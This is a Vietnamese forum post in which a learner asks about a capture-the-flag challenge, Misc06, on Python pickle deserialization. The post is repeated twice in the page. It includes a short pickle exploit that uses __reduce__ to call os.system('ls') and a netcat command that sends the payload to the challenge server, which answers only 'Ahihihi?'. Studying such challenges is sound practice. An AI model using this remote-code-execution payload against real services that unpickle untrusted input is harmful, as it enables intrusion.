learn2hack
Member
- 
							
							11/05/2018
						
- 
							
							2
						
- 
							
							17 bài viết
						
								Cho cháu hỏi bài Misc06 trong Play ! 2
							
						
						
							Cho cháu hỏi bài Misc06 trong Play ! 2
theo Mô tả và Gợi ý
Pickle
OMG! Pickle again
nc 103.237.98.28 7475
là dạng bài Deserialization Pickle,
cháu viết exploit sau
#!/usr/bin/env python
import pickle
import os
class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
#note = Note("name", "date", "content")
with open("save.pickle", 'wb') as f:
pickle.dump(Exploit(), f, protocol=0)
gửi exploit bởi lệnh:
cat save.pickle | nc 103.237.98.28 7475
nhận được respone "Ahihihi?" từ server
Cháu không hiểu ý đồ tác giả bài này là thế nào ạ?
			
			theo Mô tả và Gợi ý
Pickle
OMG! Pickle again
nc 103.237.98.28 7475
là dạng bài Deserialization Pickle,
cháu viết exploit sau
#!/usr/bin/env python
import pickle
import os
class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
#note = Note("name", "date", "content")
with open("save.pickle", 'wb') as f:
pickle.dump(Exploit(), f, protocol=0)
gửi exploit bởi lệnh:
cat save.pickle | nc 103.237.98.28 7475
nhận được respone "Ahihihi?" từ server
Cháu không hiểu ý đồ tác giả bài này là thế nào ạ?
 
 
		